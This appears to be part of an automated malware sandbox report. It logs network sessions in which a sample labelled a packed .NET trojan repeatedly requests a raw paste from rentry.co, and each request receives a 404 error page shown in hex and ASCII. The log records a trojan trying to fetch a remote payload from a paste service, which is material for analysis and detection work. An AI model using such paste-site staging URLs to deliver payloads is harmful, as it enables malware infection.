                                                                                        2024-10-18 10:43:58 UTC707INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:58 UTC1369INData Raw: 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <met
                                                                                        2024-10-18 10:43:58 UTC1369INData Raw: 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20
                                                                                        Data Ascii: .co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:43:58 UTC1015INData Raw: 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 33 31 65 64 30 39 32 63 61 65 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 7a 4f 43 34 77
                                                                                        Data Ascii: /bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ee31ed092cae',t:'MTcyOTI0ODIzOC4w
                                                                                        2024-10-18 10:43:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        65192.168.2.660722104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:59 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:44:00 UTC687INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:00 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5D1ImW4FHhZ%2F5UltWDdz3yDd%2FNBt9AoBBm6aXCIO%2Fjydz5dOpjGXX67p0cNanVWqaV5olLtPJWCFmN8eeR0yl%2FKErE%2FvGgDj%2B%2Ber8xwJvd1vUHmxhpUcY9MNsA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ee391eeee7c3-DFW
                                                                                        2024-10-18 10:44:00 UTC682INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:00 UTC1369INData Raw: 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20
                                                                                        Data Ascii: tic/icons/512.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls
                                                                                        2024-10-18 10:44:00 UTC1369INData Raw: 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20
                                                                                        Data Ascii: & 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container
                                                                                        2024-10-18 10:44:00 UTC1040INData Raw: 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 33 39 31 65 65 65
                                                                                        Data Ascii: <script src="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ee391eee
                                                                                        2024-10-18 10:44:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        66192.168.2.660723104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:00 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:44:01 UTC658INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:01 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8qYYV6w927i9wYqjJwBsFAllj9mMu9Hv5mCWSgRD8JZmDARYlcYq4J97PsLqRB81V%2BwvE%2Fx8YwBxFtFhH36Eb%2FtdK2v1Zg3zrq61UF%2BWZvHQQ3Cj5Ycmyi7wBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ee420c142ccd-DFW
                                                                                        2024-10-18 10:44:01 UTC711INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:01 UTC1369INData Raw: 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72
                                                                                        Data Ascii: eta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta pr
                                                                                        2024-10-18 10:44:01 UTC1369INData Raw: 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: ; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:01 UTC1011INData Raw: 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 34 32 30 63 31 34 32 63 63 64 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 30 4d 53 34 77 4d 44 41 77
                                                                                        Data Ascii: tstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ee420c142ccd',t:'MTcyOTI0ODI0MS4wMDAw
                                                                                        2024-10-18 10:44:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        67192.168.2.660724104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:02 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:44:02 UTC656INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:02 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vfOydLPCBUtVsJ7XHQNqbgAj5DqcbQT7sA2lTqqLSrjsdFnXwFjhOi%2BTIODpGVXyY%2F70JGva9IL2Aovp7FLSp2BUzf0m0uZnhaEdRmdqunTFMvhF9MF%2FvctONg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ee494bee6b56-DFW
                                                                                        2024-10-18 10:44:02 UTC713INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:44:02 UTC1369INData Raw: 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70
                                                                                        Data Ascii: a property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta prop
                                                                                        2024-10-18 10:44:02 UTC1369INData Raw: 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:44:02 UTC1009INData Raw: 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 65 34 39 34 62 65 65 36 62 35 36 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 30 4d 69 34 77 4d 44 41 77 4d 44
                                                                                        Data Ascii: trap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ee494bee6b56',t:'MTcyOTI0ODI0Mi4wMDAwMD
                                                                                        2024-10-18 10:44:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        68192.168.2.660725104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:44:03 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:44:03 UTC656INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:44:03 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ar3nY7NOe5603Wa%2FrCVB2E2Kst7OSJOLZbs7NKUzW3t1mdZqKxvLyRRahJTnBhDBQh3mXh23viDANJ3djtXPe2AQQ%2By7FObezJonMUzAv5UHL1rtd%2BmSR7qrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ee503b3ae9ad-DFW
